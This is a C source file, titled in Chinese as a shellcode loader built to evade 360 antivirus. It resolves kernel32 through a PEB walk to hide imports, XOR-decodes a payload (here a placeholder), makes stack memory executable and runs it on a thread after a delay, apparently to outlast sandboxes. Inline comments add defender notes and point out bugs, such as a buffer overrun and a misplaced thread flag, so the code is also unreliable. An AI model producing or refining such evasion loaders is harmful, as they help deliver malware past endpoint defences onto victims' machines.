免杀360的shellcode加载器

#include <Windows.h>
#include <stdio.h>
/*
 * Locate the in-memory base of kernel32.dll by walking the PEB loader
 * list with MSVC inline assembly instead of calling GetModuleHandle().
 *
 * 32-bit builds only: fs:[0x30] is the x86 PEB pointer, and the field
 * offsets below are the 32-bit layouts of _PEB, _PEB_LDR_DATA and
 * _LDR_DATA_TABLE_ENTRY. A 64-bit build cannot compile this (_asm) and
 * would use a different PEB location and offsets anyway.
 *
 * Returns: whatever module base the third list entry carries, cast to
 * HMODULE. Nothing verifies that this entry really is kernel32.dll; the
 * walk relies on the load order exe -> ntdll -> kernel32 holding.
 *
 * Defender note: resolving kernel32 this way keeps the lookup out of the
 * import table (an API-resolution-obfuscation marker), but the rest of
 * this file still calls GetProcAddress/CreateThread/Sleep/ResumeThread
 * directly, so those imports remain visible in the IAT.
 */
HMODULE  GetKernel32Addr() {
        HMODULE Kernel32Base = 0;
        _asm {
                mov eax, fs:[0x30] // TEB->ProcessEnvironmentBlock (PEB)
                mov eax, dword ptr[eax + 0xc]// PEB->Ldr (_PEB_LDR_DATA)
                mov eax, dword ptr[eax + 0xc]// Ldr->InLoadOrderModuleList.Flink (first entry)
                mov eax, [eax] // next entry -- assumed by the author to be ntdll.dll, not verified
                mov eax, [eax] // next entry -- assumed by the author to be kernel32.dll, not verified
                mov eax, dword ptr[eax + 0x18] // _LDR_DATA_TABLE_ENTRY.DllBase (x86 layout)
                mov Kernel32Base, eax
        }
        return Kernel32Base;
}

/*
 * Decode an XOR-masked byte string into a stack buffer, make that stack
 * memory executable, and run it on a new thread.
 *
 * Steps as written:
 *   1. buf holds the masked bytes (here only the placeholder literal
 *      "shellcode"); each byte is XORed with the single-byte key 10 and
 *      copied into shellcode[] for 841 iterations.
 *   2. VirtualProtect, resolved with GetProcAddress from the PEB-derived
 *      kernel32 base, sets the page(s) holding shellcode[] to
 *      PAGE_EXECUTE_READWRITE.
 *   3. CreateThread is pointed at the stack buffer, then the function
 *      sleeps 15 s and calls ResumeThread.
 *
 * No return value; every API result is ignored.
 *
 * Defender notes (what this pattern looks like from the outside):
 *   - a VirtualProtect call granting RWX on a *stack* address;
 *   - a thread whose start address is not backed by any loaded image;
 *   - a long Sleep right after thread creation -- presumably a
 *     sandbox-timeout delay, inferred from the constant, not stated.
 */
void start() {

        unsigned char buf[] = "shellcode"  // masked input bytes; as written only the 10-byte placeholder literal (incl. NUL)
        
        unsigned char shellcode[842];
        int len = sizeof(shellcode) - 1;  // 841, sized from the destination; with the placeholder buf the loop indexes far past buf
        for (size_t i = 0; i < len; i++)
        {
                buf[i] ^= 10;              // single-byte XOR key 0x0A, applied in place
                shellcode[i] = buf[i];
        }

        typedef BOOL(WINAPI *pVirtualProtect)(LPVOID, DWORD, DWORD, PDWORD);


        DWORD oldProtect = 0;
        HMODULE hKernal32 = GetKernel32Addr();  // PEB walk; result is not checked for NULL

        pVirtualProtect VirtualProtect = (pVirtualProtect)GetProcAddress(hKernal32, "VirtualProtect");  // NULL return would be called below unchecked

        VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);  // RWX on stack memory; return value ignored

        //VirtualProtect(&shellcode, sizeof(shellcode), oldProtect, NULL);
        HANDLE handle = CreateThread(0,0,shellcode, CREATE_SUSPENDED,0,0);  // CREATE_SUSPENDED sits in lpParameter (4th arg); dwCreationFlags (5th) is 0, so the thread is not created suspended
        Sleep(15000);
        ResumeThread(handle);  // handle is never closed
}

/* Entry point: hands off to start(). `void main()` is an MSVC extension; standard C expects int. */
void main() {

        
        
        start();
}

